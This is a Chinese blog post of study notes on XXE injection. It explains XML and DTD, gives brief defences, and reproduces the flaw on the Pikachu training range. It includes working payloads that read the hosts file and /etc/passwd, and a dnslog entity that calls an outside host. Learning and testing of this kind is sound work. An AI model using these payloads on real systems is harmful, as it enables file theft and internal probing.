web XXE漏洞

最新推荐文章于 2024-04-14 01:22:35 发布
最新推荐文章于 2024-04-14 01:22:35 发布
阅读量2k 收藏
点赞数
文章标签: xml web安全 渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/122131762
版权

XML基础
xml是可扩展的标记语言,设计用来进行数据的传输和存储,结构是树形结构。
有标签构成,有点像HTML语言,
xml被设计用来传输和存储数据。
html被用来显示数据。

**xml文档**
xml文档有根元素,根元素下面可以有多个子元素,标签 <></>需成对出现
<?xml version="1.0" encoding="utf-8"?>       
<note>                                               
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

XML DTD

DTD全称为,Document Type Definition,中文翻译为文档类型定义,是一套为了进行程序间的数据交换而建立的关于标记符的语法规则。
文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 有两种声明的方法,一种是内部声明,一种是外部声明,我们下面开具体看一下:

DTD 的内部声明:
外部需要一个DTD的文件,比如:note.dtc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
 
DTD的外部声明: 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "filename">
]>
 <note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

XXE漏洞
XML External Enti ty lnjectionxml外部实体注入漏洞
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载。
导致可能加载恶意外部文件,造成文件读取,命令执行,内网端口扫描,dos攻击等。

XXE的防御
禁用外部实体的方法
过滤用户提交的xml数据,如关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。

皮卡丘靶场漏洞复现
随便提交一个xml文档

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE root [ 
<!ENTITY name "hello world">]>
<root>&name;</root>

输入hello world 说明我们提交的xml数据被解析了。

读取hosts文件

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "C:/Windows/System32/drivers/etc/hosts">
]>
<a>&test;</a>

利用file协议读取/etc/passwd文件

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<a>&test;<

这里用dnslog检测命令执行,到dnslog官网申请一个子域名做测试
如果有访问dnslog子域名说明能执行命令。

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY xhh SYSTEM "http://fshxc1.dnslog.cn ">
]>
<a>&xhh;</a>

个人学习笔记

西湖第一剑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB漏洞——XXE
qq_63594215的博客
04-12 858
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
105-web漏洞挖掘之XXE漏洞1
08-03
理解并防范XXE漏洞对于保障Web应用程序的安全至关重要,因为它们可能导致严重的信息泄露和系统破坏。通过深入理解XML实体、XML解析器的工作原理以及如何安全地处理XML输入,开发者可以更好地保护他们的应用程序免受...
web安全】——XXE漏洞快速入门
Demo不是emo的博客
11-27 9456
XXE漏洞很难不想学?带你快速入门!
Web漏洞-XXE漏洞(详细)
Ays.Ie的博客
03-11 5537
该篇描述Web漏洞-XXE漏洞(详细)
WEB 漏洞-XXE&XML 之利用检测绕过
硫酸超的博客
08-29 632
WEB 漏洞-XXE&XML 之利用检测绕过XXE&XMLDTD内部的 DOCTYPE 声明外部DOCTYPE声明内部实体声明外部实体声明为什么使用 DTDpikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入回显玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)引入外部实体 dtd不回显读取文件xxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题复现-检测,利用,拓展,实战CTF-Jarvis-OJ-Web-XXE 安全真题复
Web安全XXE漏洞_x-requested-with xmlhttprequest,2024年最新带你一起探究网络安全事件分发机制
2401_84184638的博客
04-10 882
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
WEB安全XXE实体注入漏洞.pdf
12-12
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储...总之,理解和防范XXE漏洞对于维护Web应用的安全至关重要。开发人员应确保正确处理XML输入,限制XML解析器的功能,并时刻关注最新的安全最佳实践。
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
通过学习本节内容,您将掌握XXE漏洞的基本原理和利用方法,从而更好地保护自己的Web应用程序。 1. 测试代码介绍 在开始学习XXE漏洞利用之前,我们需要了解基本的测试代码。下面是一个简单的PHP测试代码: ```php ...
Web安全XXE漏洞_x-requested-with xmlhttprequest(1)
最新发布
2401_83947398的博客
04-14 768
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Web漏洞XXE初探
小赵同学的博客
06-24 282
XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6489
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
常见的Web漏洞——XXE(外部实体注入)
热门推荐
江左盟的博客
11-27 1万+
XML和DTD基础 XML是可扩展性标记语言,类似HTML的标记语言,但标签是自定义的。 DTD是文档类型定义,用来为XML文档定义语义约束,可以在xml文件中声明,也可以在外部引用。 XML文件结构: <? xml version="1.0" encoding="utf-8"?> DTD部分(可选) <root>Test</root> 支持的协议 上图是默认支持协议,还可以支持其他,如PHP支持的扩展协议有 DTD引用和实体声明 DTD内部声明:<!DOCT
什么是XXE漏洞XXE漏洞的原理
weixin_47112073的博客
10-25 490
因为最近做的靶机关于XXE漏洞,这里简单写一下什么是XXE漏洞,自己理解的东西,一来方便自己经常回顾,二来对还没有接触过XXE漏洞的朋友来说也比较友好
WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1437
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
Web安全-XXE漏洞
道阻且长,行则将至。
11-25 2623
XML简介 1、定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 2、文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version="1.0"?> <!--文档类型定义--> <!DOCTYPE no...
Web安全XXE漏洞
xlsj雪松的博客
01-26 652
1 定义 XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 2 XML XML是一个格式和HTML很像的标记语言,用来存储数据;XML是一个纯文本,标签都是自己定义的。 XML文件的格式: 实体写在DTD部分,XML部分是真正的存储数据的地方。DTD有两种声明方式: 1、内部 dtd:即对 XML 文档中的元素、属性和实体的 DTD 的声明都在 XML 文档中。 2、外部 dtd:即对 XML
[WEB安全]XXE漏洞总结
baguangman5501的博客
07-28 475
目录 0x00 XML基础 0x01 XML文档结构 0x02 DTD 0x03 实体 0x04 XXE漏洞 0x05 总结一些payload 0x06 XXE漏洞修复与防御 0x07 参考链接 ...
XXE漏洞深度解析与实战演练
XXE漏洞主要发生在使用XML解析器处理用户输入的场景,攻击者可以通过构造恶意的XML文档来获取敏感信息、执行远程代码甚至发起DoS攻击。此外,文中还提到了一个VulnHub靶场XXE Lab:1的过关记录,适合对前后端有一定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值